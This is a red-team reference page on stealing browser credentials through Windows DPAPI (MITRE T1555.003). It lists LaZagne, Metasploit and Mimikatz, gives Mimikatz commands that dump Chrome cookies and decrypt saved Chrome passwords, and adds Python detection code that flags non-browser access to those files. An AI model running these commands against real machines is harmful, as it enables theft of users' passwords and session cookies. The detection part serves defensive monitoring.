
🟢DPAPI - Applications

DPAPI stands for Data Protection API

MITRE ATT&CK™ T1555.003

Web browsers

| Tool | Description | Github |
| --- | --- | --- |
| LaZagne | The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. | |
| Metasploit | post/multi/gather/firefox_creds, post/windows/gather/enum_chrome | |
| Mimikatz | dpapi::chrome | |

Dump Cookies

rfs@victim02
mimikatz # dpapi::chrome /in:"%localappdata%\Google\Chrome\User Data\Default\Cookies"

Dump Chrome Credentials

mimikatz # dpapi::chrome /in:"%localappdata%\Google\Chrome\User Data\Default\Login Data" /unprotect
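
A defender-side check for the two commands above, as an added example that is not part of the original page: it flags non-browser processes opening the Chrome Cookies or Login Data files, and dpapi::chrome appearing in a process command line. The events are constructed and use simplified field names modelled on Windows Security events 4663 and 4688; the chrome.exe-only allowlist and the tool.exe image name are assumptions.

```python
import ntpath
import re

# Chrome profile stores targeted above; newer Chrome keeps Cookies in a Network subfolder.
SENSITIVE = re.compile(
    r"\\Google\\Chrome\\User Data\\[^\\]+\\(?:Network\\)?(Cookies|Login Data)$",
    re.IGNORECASE,
)
MODULE = re.compile(r"dpapi::chrome", re.IGNORECASE)
# Assumption: only the browser itself should open these files. A production
# rule should match the full image path and signer, not just the file name.
ALLOWED_IMAGES = {"chrome.exe"}

# Constructed sample events with simplified fields (not real log output).
CHROME_DIR = r"C:\Users\rfs\AppData\Local\Google\Chrome\User Data\Default"
SAMPLE_EVENTS = [
    {"EventID": 4663, "ObjectName": CHROME_DIR + r"\Login Data",
     "ProcessName": r"C:\Program Files\Google\Chrome\Application\chrome.exe"},
    {"EventID": 4663, "ObjectName": CHROME_DIR + r"\Login Data",
     "ProcessName": r"C:\Users\rfs\Downloads\tool.exe"},
    {"EventID": 4663, "ObjectName": CHROME_DIR + r"\Network\Cookies",
     "ProcessName": r"C:\Users\rfs\Downloads\tool.exe"},
    {"EventID": 4663, "ObjectName": r"C:\Users\rfs\Documents\notes.txt",
     "ProcessName": r"C:\Windows\explorer.exe"},
    {"EventID": 4688, "CommandLine": r'tool.exe "dpapi::chrome /in:Cookies" exit'},
]


def triage(events):
    """Return (reason, event) pairs that deserve an analyst's attention."""
    findings = []
    for ev in events:
        if ev.get("EventID") == 4688:
            # Only catches the module when passed as a process argument;
            # commands typed at an interactive prompt never reach 4688.
            if MODULE.search(ev.get("CommandLine", "")):
                findings.append(("dpapi::chrome on command line", ev))
        elif ev.get("EventID") == 4663:
            # Needs an auditing SACL on the profile files to be generated.
            hit = SENSITIVE.search(ev.get("ObjectName", ""))
            image = ntpath.basename(ev.get("ProcessName", "")).lower()
            if hit and image not in ALLOWED_IMAGES:
                findings.append((f"non-browser access to {hit.group(1)}", ev))
    return findings


if __name__ == "__main__":
    for reason, ev in triage(SAMPLE_EVENTS):
        print(reason, "->", ev.get("ProcessName") or ev.get("CommandLine"))
```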
